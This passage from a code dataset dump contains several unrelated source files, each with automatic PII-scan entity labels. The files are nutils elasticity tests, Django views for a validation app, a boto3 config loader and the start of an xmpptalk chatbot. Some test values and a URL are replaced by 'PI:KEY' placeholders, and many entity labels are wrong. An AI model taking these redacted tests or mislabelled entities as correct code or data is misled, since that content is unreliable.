__name__ == '__main__': + cli.run(main) + +# Once a simulation is developed and tested, it is good practice to save a few +# strategic return values for regression testing. The :mod:`nutils.testing` +# module, which builds on the standard :mod:`unittest` framework, facilitates +# this by providing :func:`nutils.testing.TestCase.assertAlmostEqual64` for the +# embedding of desired results as compressed base64 data. + +class test(testing.TestCase): + + @testing.requires('matplotlib') + def test_default(self): + cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.25) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYMACGsiHP0wxMQBKlBdi''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + eNpjYMAEKcaiRmLGQQZCxgwMYsbrzqcYvz672KTMaIKJimG7CQPDBJM75xabdJ3NMO0xSjG1MUw0Beox + PXIuw7Tk7A/TXqMfQLEfQLEfQLEfpsVnAUzzHtI=''') + + @testing.requires('matplotlib') + def test_mixed(self): + cons, lhs = main(nelems=4, etype='mixed', btype='std', degree=1, poisson=.25) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYICCBiiEsdFpIuEPU0wMAG6UF2I=''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + PI:KEY + PI:KEY''') + + @testing.requires('matplotlib') + def test_quadratic(self): + cons, lhs = main(nelems=4, etype='square', btype='std', degree=2, poisson=.25) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYCACNIxc+MOUMAYA/+NOFg==''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + eNqFzLPI:KEY + PI:KEY + PI:KEY + PI:KEY + PI:KEY''') + + @testing.requires('matplotlib') + def test_poisson(self): + cons, lhs = main(nelems=4, etype='square', btype='std', degree=1, poisson=.4) + with self.subTest('constraints'): self.assertAlmostEqual64(cons, ''' + eNpjYMACGsiHP0wxMQBKlBdi''') + with self.subTest('left-hand side'): self.assertAlmostEqual64(lhs, ''' + eNpjYMAEFsaTjdcYvTFcasTAsMZI5JyFce6ZKSavjbNMFhhFmDAwZJkknJ1iInom0ZTJJNx0q1GgKQND + uKn32UTTf6d/mLKY/DDdZvQDKPbD1OvsD9M/pwGZyh9l''') +",4221,"[['PERSON', ""ns.u_i = '""], ['PERSON', 'basis_ni'], ['PERSON', ""X_i = 'x_i""], ['PERSON', 'd(u_i'], ['PERSON', 'sqr'], ['PERSON', 'sqr'], ['PERSON', ""bezier = domain.sample('bezier'""], 
['PERSON', ""sxy = bezier.eval(['X'""], ['LOCATION', 'TestCase'], ['IP_ADDRESS', '::\n\n '], ['URL', 'function.Na'], ['URL', 'ns.ba'], ['URL', 'domain.ba'], ['URL', 'ns.mu'], ['URL', 'ns.st'], ['URL', 'ns.st'], ['URL', 'domain.bo'], ['URL', 'domain.bo'], ['URL', 'domain.int'], ['URL', 'solver.so'], ['URL', 'domain.sa'], ['URL', 'export.tr'], ['URL', 'shear.pn'], ['URL', 'bezier.tr'], ['URL', 'bezier.hu'], ['URL', 'nutils.cli.ru'], ['URL', 'elasticity.py'], ['URL', 'elasticity.py'], ['URL', 'cli.ru'], ['URL', 'nutils.testing.TestCase.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'testing.re'], ['URL', 'self.su'], ['URL', 'self.as'], ['URL', 'self.su'], ['URL', 'self.as']]" +27,"import json +import random +import datetime + +from codalib import APP_AUTHOR +from codalib.bagatom import wrapAtom, makeObjectFeed +from dateutil import parser +from django.conf import settings +from django.contrib.sites.models import Site +from django.contrib.syndication.views import Feed +from django.core.paginator import Paginator +from django.http import HttpResponse, HttpResponseNotFound +from django.shortcuts import get_object_or_404, render +from django.utils.feedgenerator import Atom1Feed +from lxml import etree + +from django.views.generic import ListView + +from .models import Validate + + +XML_HEADER = b""\n%s"" + + +class CorrectMimeTypeFeed(Atom1Feed): + mime_type = 'application/xml' + + +class AtomNextNewsFeed(Feed): + """""" + next view. + an atom pub representation of the next validation to occur. + should be a single item. + """""" + + feed_type = Atom1Feed + link = ""/validate/next/"" + title = ""UNT Coda Validate App"" + subtitle = ""The highest priority validation item"" + reason = 'None' + author_name = APP_AUTHOR.get('name', None) + author_link = APP_AUTHOR.get('uri', None) + feed_type = CorrectMimeTypeFeed + + def get_object(self, request, server): + if server: + return server + else: + return None + + def items(self, obj): + # need to filter by server first, if provided + reason = '' + if obj: + validations = Validate.objects.all().filter(server=obj) + reason = 'This selection was filtered to only consider \ + server %s. ' % obj + else: + validations = Validate.objects.all() + # next check if we have any with a priority above 0 + v = validations.filter( + priority__gt=0).order_by('priority_change_date') + if v.exists(): + reason += 'Item was chosen because it is the \ +oldest prioritized.' + # if set is empty, go with any priority with last_verified older than + # settings.VALIDATION_PERIOD + else: + # It might seem natural to use django's built-in random ordering, + # but that technique becomes slow when using large sets + # because 'order by ?' is very expensive against MySQL dbs. + # v = Validate.objects.all().filter( + # last_verified__gte=datetime.datetime.now() - + # settings.VALIDATION_PERIOD + # ).order_by('?') + # instead, let's do this: + # http://elpenia.wordpress.PI:KEY + now = datetime.datetime.now() + v = validations.filter( + last_verified__lte=now - settings.VALIDATION_PERIOD + ) + if v.exists(): + random_slice = int(random.random() * v.count()) + v = v[random_slice:] + reason += 'Item was randomly selected and within the \ +past year because there is no prioritized record.' 
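+            # The random-offset idiom above, shown in isolation (a sketch,
+            # not original code; qs stands for any queryset):
+            #
+            #   i = int(random.random() * qs.count())
+            #   pick = qs[i:][:1]   # SQL OFFSET i LIMIT 1, cheap on MySQL
+            #
+            # compared with qs.order_by('?')[:1], which makes the database
+            # shuffle the whole table before returning one row.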
+ # if that set has no objects, pick the oldest verified item. + else: + v = validations.order_by('last_verified') + reason += 'Item was chosen because there \ +is no prioritized record and it had not been validated in the longest \ +duration of time.' + self.reason = reason + return v[:1] + + def item_title(self, item): + return item.identifier + + def item_description(self, item): + return self.reason + + def item_link(self, item): + return '/APP/validate/%s/' % item.identifier + + +# for some reason, I couldn't get AtomNextFeed to work without a server +# I don't think optional arguments are supported for class-based syndication +# feeds, so I have this work around to make it work. +class AtomNextFeedNoServer(AtomNextNewsFeed): + def get_object(self, request): + pass + + +def index(request): + context = { + 'recently_prioritized': Validate.objects.filter( + priority__gt=0).order_by('-priority_change_date')[:20], + 'recently_verified': Validate.objects.all().order_by('-last_verified')[:20], + 'verified_counts': Validate.objects.last_verified_status_counts() + } + + return render(request, 'coda_validate/index.html', context) + + +def last_day_of_month(year, month): + """""" Work out the last day of the month """""" + last_days = [31, 30, 29, 28, 27] + for i in last_days: + try: + end = datetime.datetime(year, month, i) + except ValueError: + continue + else: + return end.day + return None + + +def stats(request): + """""" + stats page + """""" + if not Validate.objects.exists(): + return render( + request, + 'coda_validate/stats.html', + { + 'sums_by_date': {}, + 'validations': None, + 'this_month': None, + 'last_24h': None, + 'last_vp': None, + 'unverified': 0, + 'passed': 0, + 'failed': 0, + 'validation_period': '%s days' % str( + settings.VALIDATION_PERIOD.days + ), + } + ) + # resolve the range for last month filter + today = datetime.date.today() + first = datetime.date(day=1, month=today.month, year=today.year) + last_day = last_day_of_month(first.year, first.month) + this_month_range = [ + '%s-%s-01 00:00:00' % (first.year, first.month), + '%s-%s-%s 23:59:59' % (first.year, first.month, last_day), + ] + # resolve the range for last 24 hours filter + now = datetime.datetime.now() + twenty_four_hours_ago = now - datetime.timedelta(hours=24) + since_validation_period = now - datetime.timedelta( + days=settings.VALIDATION_PERIOD.days) + # make a set of data that makes sense for the heatmap + result_counts = Validate.objects.last_verified_status_counts() + total = sum(result_counts.values()) + sums_by_date = Validate.sums_by_date() + sums_by_date_g = {} + years = set() + for dt, ct in sums_by_date.items(): + y, m, d = dt + dt = (y, m - 1, d) + sums_by_date_g[dt] = ct + years.add(y) + sums_by_date = sums_by_date_g + num_years = len(years) + return render( + request, + 'coda_validate/stats.html', + { + 'sums_by_date': dict((('%d, %d, %d' % s, c) + for s, c in sums_by_date.items())), + 'num_years': num_years, + 'validations': total, + 'this_month': Validate.objects.filter( + last_verified__range=this_month_range).count(), + 'last_24h': Validate.objects.filter( + last_verified__range=[twenty_four_hours_ago, now]).count(), + 'last_vp': Validate.objects.filter( + last_verified__range=[since_validation_period, now]).count(), + 'unverified': result_counts.get('Unverified'), + 'passed': result_counts.get('Passed'), + 'failed': result_counts.get('Failed'), + 'validation_period': '%s days' % str(settings.VALIDATION_PERIOD.days), + } + ) + + +def prioritize(request): + """""" + prioritize view + 
"""""" + + identifier = request.GET.get('identifier') + prioritized = False + if identifier: + v = get_object_or_404(Validate, identifier=identifier) + v.priority = 1 + v.priority_change_date = datetime.datetime.now() + v.save() + prioritized = True + return render( + request, + 'coda_validate/prioritize.html', + { + 'identifier': identifier, + 'prioritized': prioritized, + } + ) + + +def validate(request, identifier): + """""" + prioritize view + """""" + + # this view always gets an identifier, if it's wrong, 404 + v = get_object_or_404(Validate, identifier=identifier) + # clicked priority button on validate detail page + p = request.GET.get('priority') + if p == '1': + v.priority = 1 + v.priority_change_date = datetime.datetime.now() + v.save() + return render( + request, + 'coda_validate/validate.html', + { + 'validate': v, + } + ) + + +def prioritize_json(request): + """""" + prioritize json view + """""" + + DOMAIN = Site.objects.get_current().domain + identifier = request.GET.get('identifier') + json_dict = {} + json_dict['status'] = 'failure' + status = 404 + if identifier: + json_dict['requested_identifier'] = identifier + try: + v = Validate.objects.get(identifier=identifier) + except Exception: + v = None + if v: + v.priority = 1 + v.priority_change_date = datetime.datetime.now() + v.save() + json_dict['status'] = 'success' + json_dict['priority'] = v.priority + json_dict['priority_change_date'] = str(v.priority_change_date) + json_dict['atom_pub_url'] = '%s/APP/validate/%s' % \ + (DOMAIN, v.identifier) + status = 200 + else: + json_dict['response'] = 'identifier was not found' + json_dict['requested_identifier'] = identifier + else: + json_dict['response'] = 'missing identifier parameter' + json_dict['requested_identifier'] = '' + status = 400 + response = HttpResponse(content_type='application/json', status=status) + json.dump( + json_dict, + fp=response, + indent=4, + sort_keys=True, + ) + return response + + +def validateToXML(validateObject): + """""" + This is the reverse of xmlToValidateObject. + Given a ""Validate"" object, it generates an + XML object representative of such. 
+ """""" + + # define namespace + validate_namespace = ""http://digital2.library.unt.edu/coda/validatexml/"" + val = ""{%s}"" % validate_namespace + validate_nsmap = {""validate"": validate_namespace} + + # build xml from object and return + XML = etree.Element(""{0}validate"".format(val), nsmap=validate_nsmap) + + label = etree.SubElement(XML, ""{0}identifier"".format(val)) + label.text = validateObject.identifier + + last_verified = etree.SubElement(XML, ""{0}last_verified"".format(val)) + last_verified.text = validateObject.last_verified.isoformat() + + last_verified_status = etree.SubElement(XML, ""{0}last_verified_status"".format(val)) + last_verified_status.text = validateObject.last_verified_status + + priority_change_date = etree.SubElement(XML, ""{0}priority_change_date"".format(val)) + priority_change_date.text = validateObject.priority_change_date.isoformat() + + priority = etree.SubElement(XML, ""{0}priority"".format(val)) + priority.text = str(validateObject.priority) + + server = etree.SubElement(XML, ""{0}server"".format(val)) + server.text = validateObject.server + + return XML + + +def xmlToValidateObject(validateXML): + """""" + Parse the XML in a POST request and create the validate object + """""" + + entryRoot = etree.XML(validateXML) + if entryRoot is None: + raise ValueError(""Unable to parse uploaded XML"") + # parse XML + contentElement = entryRoot.xpath(""*[local-name() = 'content']"")[0] + validateXML = contentElement.xpath(""*[local-name() = 'validate']"")[0] + identifier = validateXML.xpath( + ""*[local-name() = 'identifier']"")[0].text.strip() + + last_verified = validateXML.xpath( + ""*[local-name() = 'last_verified']"")[0].text.strip() + last_verified = parser.parse(last_verified) + + last_verified_status = validateXML.xpath( + ""*[local-name() = 'last_verified_status']"")[0].text.strip() + + priority_change_date = validateXML.xpath( + ""*[local-name() = 'priority_change_date']"")[0].text.strip() + priority_change_date = parser.parse(priority_change_date) + + priority = validateXML.xpath( + ""*[local-name() = 'priority']"")[0].text.strip() + + server = validateXML.xpath(""*[local-name() = 'server']"")[0].text.strip() + + # make the object and return + validate = Validate( + identifier=identifier, + last_verified=last_verified, + last_verified_status=last_verified_status, + priority_change_date=priority_change_date, + priority=priority, + server=server, + ) + return validate + + +def xmlToUpdateValidateObject(validateXML): + """""" + Parse the XML in a PUT request and adjust the validate based on that + *ONLY MODIFIES 'last_verified_status'* + """""" + + entryRoot = etree.XML(validateXML) + if entryRoot is None: + raise ValueError(""Unable to parse uploaded XML"") + # parse XML + contentElement = entryRoot.xpath(""*[local-name() = 'content']"")[0] + validateXML = contentElement.xpath(""*[local-name() = 'validate']"")[0] + identifier = validateXML.xpath( + ""*[local-name() = 'identifier']"")[0].text.strip() + last_verified_status = validateXML.xpath( + ""*[local-name() = 'last_verified_status']"")[0].text.strip() + # get the object (or 404) and return to the APP view to finish up. 
+    validate = get_object_or_404(Validate, identifier=identifier)
+    validate.last_verified_status = last_verified_status
+    validate.last_verified = datetime.datetime.now()
+    validate.priority = 0
+    validate.save()
+    return validate
+
+
+def app_validate(request, identifier=None):
+    """"""
+    This view handles the AtomPub protocol for validate objects
+    """"""
+
+    # are we POSTing a new identifier here?
+    if request.method == 'POST' and not identifier:
+        # to object
+        validateObject = xmlToValidateObject(request.body)
+        validateObject.save()
+        # and back to xml
+        validateObjectXML = validateToXML(validateObject)
+        atomXML = wrapAtom(
+            xml=validateObjectXML,
+            id='http://%s/APP/validate/%s/' % (
+                request.META['HTTP_HOST'], validateObject.identifier
+            ),
+            title=validateObject.identifier,
+        )
+        atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
+        resp = HttpResponse(atomText, content_type=""application/atom+xml"")
+        resp.status_code = 201
+        resp['Location'] = 'http://%s/APP/validate/%s/' % \
+            (request.META['HTTP_HOST'], validateObject.identifier)
+    elif request.method == 'HEAD':
+        resp = HttpResponse(content_type=""application/atom+xml"")
+        resp.status_code = 200
+    # if not, return a feed
+    elif request.method == 'GET' and not identifier:
+        # negotiate the details of our feed here
+        validates = Validate.objects.all()
+        page = int(request.GET['page']) if request.GET.get('page') else 1
+        atomFeed = makeObjectFeed(
+            paginator=Paginator(validates, 20),
+            objectToXMLFunction=validateToXML,
+            feedId=request.path[1:],
+            webRoot='http://%s' % request.META.get('HTTP_HOST'),
+            title=""validate Entry Feed"",
+            idAttr=""identifier"",
+            nameAttr=""identifier"",
+            dateAttr=""added"",
+            request=request,
+            page=page,
+            author={
+                ""name"": APP_AUTHOR.get('name', None),
+                ""uri"": APP_AUTHOR.get('uri', None)
+            },
+        )
+        atomFeedText = XML_HEADER % etree.tostring(atomFeed, pretty_print=True)
+        resp = HttpResponse(atomFeedText, content_type=""application/atom+xml"")
+        resp.status_code = 200
+    # updating an existing record
+    elif request.method == 'PUT' and identifier:
+        returnValidate = xmlToUpdateValidateObject(request.body)
+        validateObjectXML = validateToXML(returnValidate)
+        atomXML = wrapAtom(
+            xml=validateObjectXML,
+            id='http://%s/APP/validate/%s/' % (
+                request.META['HTTP_HOST'], identifier
+            ),
+            title=identifier,
+        )
+        atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
+        resp = HttpResponse(atomText, content_type=""application/atom+xml"")
+        resp.status_code = 200
+    elif request.method == 'GET' and identifier:
+        # attempt to retrieve record -- error if unable
+        try:
+            validate_object = Validate.objects.get(identifier=identifier)
+        except Validate.DoesNotExist:
+            return HttpResponseNotFound(
+                ""There is no validate for identifier %s.\n"" % identifier
+            )
+        returnValidate = validate_object
+        validateObjectXML = validateToXML(returnValidate)
+        atomXML = wrapAtom(
+            xml=validateObjectXML,
+            id='http://%s/APP/validate/%s/' % (
+                request.META['HTTP_HOST'], identifier
+            ),
+            title=identifier,
+            author=APP_AUTHOR.get('name', None),
+            author_uri=APP_AUTHOR.get('uri', None)
+        )
+        atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True)
+        resp = HttpResponse(atomText, content_type=""application/atom+xml"")
+        resp.status_code = 200
+    elif request.method == 'DELETE' and identifier:
+        # attempt to retrieve record -- error if unable
+        try:
+            validate_object = Validate.objects.get(identifier=identifier)
+        except Validate.DoesNotExist:
+            return HttpResponseNotFound(
+                ""Unable to Delete. 
There is no identifier %s.\n"" % identifier) + # grab the validate, delete it, and inform the user. + returnValidate = validate_object + validateObjectXML = validateToXML(returnValidate) + validate_object.delete() + atomXML = wrapAtom( + xml=validateObjectXML, + id='http://%s/APP/validate/%s/' % ( + request.META['HTTP_HOST'], identifier + ), + title=identifier, + ) + atomText = XML_HEADER % etree.tostring(atomXML, pretty_print=True) + resp = HttpResponse(atomText, content_type=""application/atom+xml"") + resp.status_code = 200 + return resp + + +def check_json(request): + counts = Validate.objects.last_verified_status_counts() + return HttpResponse(json.dumps(counts), content_type='application/json') + + +class ValidateListView(ListView): + model = Validate + template_name = 'coda_validate/list.html' + context_object_name = 'validation_list' + paginate_by = 20 + + def get_queryset(self): + queryset = super(ValidateListView, self).get_queryset() + + status = self.request.GET.get('status') + if status: + queryset = queryset.filter(last_verified_status=status) + + return queryset +",18335,"[['PERSON', 'codalib.bagatom'], ['URL', 'AUTHOR.ge'], ['DATE_TIME', 'past year'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['DATE_TIME', 'last_day_of_month(year, month'], ['DATE_TIME', '30'], ['DATE_TIME', '29'], ['DATE_TIME', '28'], ['DATE_TIME', ""days'""], ['DATE_TIME', 'last month'], ['DATE_TIME', 'today'], ['DATE_TIME', 'month'], ['DATE_TIME', 'last_day'], ['PERSON', '00:00:00'], ['DATE_TIME', 'last 24 hours'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'num_years'], ['LOCATION', 'sums_by_date.items'], ['PERSON', 'Validate.objects.filter'], ['DATE_TIME', ""days'""], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'last_verified_status = etree'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'SubElement(XML'], ['PERSON', 'Parse'], ['PERSON', 'Parse'], ['PERSON', 'Validate.objects.last_verified_status_counts'], ['URL', 'http://digital2.library.unt.edu/coda/validatexml/""'], ['URL', 'codalib.ba'], ['URL', 'django.co'], ['URL', 'django.contrib.sites.mo'], ['URL', 'django.contrib.syndication.vi'], ['URL', 'django.core.pa'], ['URL', 'django.ht'], ['URL', 'django.sh'], ['URL', 'django.views.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.al'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.al'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'datetime.datetime.no'], ['URL', 'validations.fi'], ['URL', 'settings.VA'], ['URL', 'v.co'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'self.re'], ['URL', 'item.id'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.al'], ['URL', 'Validate.objects.la'], ['URL', 'index.ht'], ['URL', 'stats.ht'], ['URL', 'settings.VA'], ['URL', 'datetime.date.to'], ['URL', 'today.mo'], ['URL', 'today.ye'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'first.ye'], ['URL', 'first.mo'], ['URL', 'datetime.datetime.no'], ['URL', 'settings.VA'], ['URL', 'Validate.objects.la'], ['URL', 'counts.va'], ['URL', 'Validate.su'], ['URL', 'date.it'], ['URL', 'years.ad'], ['URL', 'stats.ht'], ['URL', 'date.it'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.fi'], ['URL', 'Validate.objects.fi'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'counts.ge'], ['URL', 'settings.VA'], ['URL', 
'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'prioritize.ht'], ['URL', 'request.GET.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'validate.ht'], ['URL', 'Site.objects.ge'], ['URL', 'request.GET.ge'], ['URL', 'Validate.objects.ge'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'datetime.datetime.no'], ['URL', 'v.sa'], ['URL', 'v.pr'], ['URL', 'v.pr'], ['URL', 'v.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.id'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'verified.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.la'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'date.is'], ['URL', 'etree.Su'], ['URL', 'validateObject.pr'], ['URL', 'etree.Su'], ['URL', 'validateObject.se'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'parser.pa'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', '.text.st'], ['URL', 'validate.la'], ['URL', 'validate.la'], ['URL', 'datetime.datetime.no'], ['URL', 'validate.pr'], ['URL', 'validate.sa'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'validateObject.sa'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'validateObject.id'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.ME'], ['URL', 'validateObject.id'], ['URL', 'request.me'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.al'], ['URL', 'request.GE'], ['URL', 'request.GET.ge'], ['URL', 'request.pa'], ['URL', 'request.META.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'request.bo'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'Validate.Do'], ['URL', 'request.ME'], ['URL', 'AUTHOR.ge'], ['URL', 'AUTHOR.ge'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'request.me'], ['URL', 'Validate.objects.ge'], ['URL', 'object.de'], ['URL', 'request.ME'], ['URL', 'etree.to'], ['URL', 'resp.st'], ['URL', 'Validate.objects.la'], ['URL', 'list.ht'], ['URL', 'self.request.GET.ge'], ['URL', 'queryset.fi']]"
+28,"#!/usr/bin/env python2
+# coding=utf-8
+""""""
+Config Handler
+""""""
+
+__author__ = ""Manuel Ebert""
+__copyright__ = ""Copyright 2015, summer.ai""
+__date__ = ""2015-11-09""
+__email__ = ""dummy@email.com""
+
+import boto3
+import os
+from util import AttrDict
+
+path = os.path.dirname(os.path.abspath(__file__))
+
+
+def load_yaml(filename):
+    """"""
+    This is a very crude YAML parser. If we were grown-ups, we'd use PyYaml
+    of course. But since PyYaml refuses to run on AWS Lambda, we'll do this
+    instead.
+
+    Args:
+        filename - filename to load
+    Returns:
+        dict
+    """"""
+    def parse_value(value):
+        if ""#"" in value:
+            value = value[:value.index(""#"")]
+        value = value.strip("" \n"")
+        if not value:
+            return None
+        if value.lower() == ""true"":
+            return True
+        if value.lower() == ""false"":
+            return False
+        try:
+            return int(value)
+        except ValueError:
+            try:
+                return float(value)
+            except ValueError:
+                return value
+    result = {}
+    current_key = None
+    with open(filename) as f:
+        for line in f.readlines():
+            if "":"" in line:
+                key, value = line.split("":"", 1)
+                key = key.strip()
+                current_key = key
+                result[key] = parse_value(value)
+            elif line.strip().startswith(""-""):
+                value = line.strip("" -\n"")
+                if not isinstance(result[current_key], list):
+                    result[current_key] = [parse_value(value)]
+                else:
+                    result[current_key].append(parse_value(value))
+    return result
+
+
+def abs_path(filename):
+    return os.path.join(path, ""config"", ""{}.yaml"".format(filename))
+
+
+def load_config(config):
+    keys = load_yaml(abs_path(""default""))
+
+    keys['credentials'] = {}
+    if os.path.exists(abs_path(""credentials"")):
+        keys['credentials'] = load_yaml(abs_path(""credentials""))
+
+    if config != 'default':
+        keys.update(load_yaml(abs_path(config)))
+
+    if ""aws_access_key"" in keys['credentials']:
+        keys['s3'] = boto3.resource(
+            's3', region_name=keys['region'],
+            aws_access_key_id=keys['credentials']['aws_access_key'],
+            aws_secret_access_key=keys['credentials']['aws_access_secret']
+        )
+        keys['s3_client'] = boto3.client(
+            's3', region_name=keys['region'],
+            aws_access_key_id=keys['credentials']['aws_access_key'],
+            aws_secret_access_key=keys['credentials']['aws_access_secret']
+        )
+    else:
+        keys['s3'] = boto3.resource('s3', region_name=keys['region'])
+        keys['s3_client'] = boto3.client('s3', region_name=keys['region'])
+
+    return AttrDict(keys)
+
+
+config = load_config(os.environ.get('WORDNIK_CONFIG', 'default'))
+
+
+def update_config(config_name):
+    global config
+    # NOTE: this relies on AttrDict exposing its backing dict as `__data`;
+    # no name mangling is applied to this lookup outside a class body.
+    config.__data.update(load_yaml(abs_path(config_name)))
+",2919,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-11-09'], ['PERSON', 'Manuel Ebert'], ['DATE_TIME', '2015'], ['PERSON', 'Args'], ['URL', 'summer.ai'], ['URL', 'email.com'], ['URL', 'os.pa'], ['URL', 'os.pa'], ['URL', 'value.in'], ['URL', 'value.st'], ['URL', 'f.re'], ['URL', 'key.st'], ['URL', 'line.st'], ['URL', 'line.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'boto3.re'], ['URL', 'boto3.cl'], ['URL', 'os.environ.ge']]"
+29,"#!/usr/bin/env python3
+# vim:fileencoding=utf-8
+#
+# (C) Copyright 2012 lilydjwg dummy@email.com
+#
+# This file is part of xmpptalk.
+#
+# xmpptalk is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# xmpptalk is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with xmpptalk. If not, see <http://www.gnu.org/licenses/>.
+#
+
+import sys
+import os
+import logging
+import datetime
+import base64
+import hashlib
+from collections import defaultdict
+from functools import partial
+from xml.etree import ElementTree as ET
+
+import pyxmpp2.exceptions
+from pyxmpp2.jid import JID
+from pyxmpp2.message import Message
+from pyxmpp2.presence import Presence
+from pyxmpp2.client import Client
+from pyxmpp2.settings import XMPPSettings
+from pyxmpp2.roster import RosterReceivedEvent
+from pyxmpp2.interfaces import EventHandler, event_handler, QUIT, NO_CHANGE
+from pyxmpp2.streamevents import AuthorizedEvent, DisconnectedEvent
+from pyxmpp2.interfaces import XMPPFeatureHandler
+from pyxmpp2.interfaces import presence_stanza_handler, message_stanza_handler
+from pyxmpp2.ext.version import VersionProvider
+from pyxmpp2.expdict import ExpiringDictionary
+from pyxmpp2.iq import Iq
+
+try:
+  from xmpp_receipt import ReceiptSender
+except ImportError:
+  ReceiptSender = None
+
+from misc import *
+import config
+import models
+from models import ValidationError
+from messages import MessageMixin
+from user import UserMixin
+
+if getattr(config, 'conn_lost_interval_minutes', False):
+  conn_lost_interval = datetime.timedelta(minutes=config.conn_lost_interval_minutes)
+else:
+  conn_lost_interval = None
+
+class ChatBot(MessageMixin, UserMixin, EventHandler, XMPPFeatureHandler):
+  got_roster = False
+  message_queue = None
+  receipt_sender = None
+  ignore = set()
+
+  def __init__(self, jid, settings, botsettings=None):
+    if 'software_name' not in settings:
+      settings['software_name'] = self.__class__.__name__
+    if 'software_version' not in settings:
+      settings['software_version'] = __version__
+    version_provider = VersionProvider(settings)
+
+    handlers = []
+    if ReceiptSender:
+      self.receipt_sender = rs = ReceiptSender()
+      handlers.append(rs)
+
+    handlers.extend([self, version_provider])
+    self.client = Client(jid, handlers, settings)
+
+    self.presence = defaultdict(dict)
+    self.subscribes = ExpiringDictionary(default_timeout=5)
+    self.invited = {}
+    self.avatar_hash = None
+    self.settings = botsettings
+
+  def run(self):
+    self.client.connect()
+    self.jid = self.client.jid.bare()
+    logger.info('self jid: %r', self.jid)
+    self.update_on_setstatus = set()
+
+    if self.receipt_sender:
+      self.receipt_sender.stream = self.client.stream
+    self.client.run()
+
+  def disconnect(self):
+    '''Request disconnection and let the main loop run for 2 more
+    seconds for graceful disconnection.'''
+    self.client.disconnect()
+    while True:
+      try:
+        self.client.run(timeout = 2)
+      except pyxmpp2.exceptions.StreamParseError:
+        # we raise SystemExit to exit, expat says XML_ERROR_FINISHED
+        pass
+      else:
+        break
+
+  def handle_early_message(self):
+    self.got_roster = True
+    q = self.message_queue
+    if q:
+      self.now = datetime.datetime.utcnow()
+      for sender, stanza in q:
+        self.current_jid = sender
+        self._cached_jid = None
+        try:
+          timestamp = stanza.as_xml().find('{urn:xmpp:delay}delay').attrib['stamp']
+        except AttributeError:
+          timestamp = None
+        self.handle_message(stanza.body, timestamp)
+    self.message_queue = self.__class__.message_queue = None
+
+  @event_handler(RosterReceivedEvent)
+  def roster_received(self, stanza):
+    self.delayed_call(2, self.handle_early_message)
+    self.delayed_call(getattr(config, 'reconnect_timeout', 24 * 3600), self.signal_connect)
+    nick, avatar_type, avatar_file = (getattr(config, x, None) for x in ('nick', 'avatar_type', 'avatar_file'))
+    if nick or (avatar_type and avatar_file):
+      self.set_vcard(nick, (avatar_type, 
avatar_file))
+    return True
+
